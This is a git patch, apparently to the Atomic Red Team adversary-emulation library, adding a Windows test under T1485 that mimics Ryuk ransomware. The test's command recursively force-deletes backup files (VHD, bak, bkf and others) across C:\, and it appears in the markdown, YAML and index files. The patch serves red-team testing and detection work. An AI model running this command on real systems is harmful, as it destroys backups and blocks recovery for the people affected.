From d6f86288182ecbb150db2c01d611b70ba146c0b0 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Thu, 14 Nov 2019 15:06:09 -0600 Subject: [PATCH] T1485 Test to delete backup files similar to Ryuk (#659) * T1485 Test to delete backup files similar to Ryuk * Generate docs from job=validate_atomics_generate_docs branch=t1485-del-backups --- atomics/T1485/T1485.md | 18 ++++++++++++++++++ atomics/T1485/T1485.yaml | 14 +++++++++++++- atomics/index.md | 1 + atomics/index.yaml | 14 +++++++++++++- atomics/windows-index.md | 1 + 5 files changed, 46 insertions(+), 2 deletions(-) diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index d57cabe4..ebd00c73 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -18,6 +18,8 @@ To maximize impact on the target organization in operations where network-wide a - [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd) +- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files) +
@@ -114,4 +116,20 @@ dd of=#{file_to_overwrite} if=#{overwrite_source} +
+
+ +## Atomic Test #6 - Windows - Delete Backup Files +Deletes backup files in a manner similar to Ryuk ransomware. + +**Supported Platforms:** Windows + + +#### Run it with `command_prompt`! +``` +del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk +``` + + +
diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index a0c216cc..cb61c927 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -87,4 +87,16 @@ atomic_tests: executor: name: bash command: | - dd of=#{file_to_overwrite} if=#{overwrite_source} \ No newline at end of file + dd of=#{file_to_overwrite} if=#{overwrite_source} + +- name: Windows - Delete Backup Files + description: | + Deletes backup files in a manner similar to Ryuk ransomware. + + supported_platforms: + - windows + + executor: + name: command_prompt + command: | + del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk \ No newline at end of file diff --git a/atomics/index.md b/atomics/index.md index 88270e2c..e1b2e7c2 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -474,6 +474,7 @@ - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - Atomic Test #5: macOS/Linux - Overwrite file with DD [centos, linux, macos, ubuntu] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 243d8e5c..116f896d 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -13903,7 +13903,19 @@ impact: default: "/var/log/syslog" executor: name: bash - command: dd of=#{file_to_overwrite} if=#{overwrite_source} + command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} + +' + - name: Windows - Delete Backup Files + description: 'Deletes backup files in a manner similar to Ryuk ransomware. + +' + supported_platforms: + - windows + executor: + name: command_prompt + command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* + c:\backup*.* c:\*.set c:\*.win c:\*.dsk '': technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index aef1b765..a4a50715 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -330,6 +330,7 @@ - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)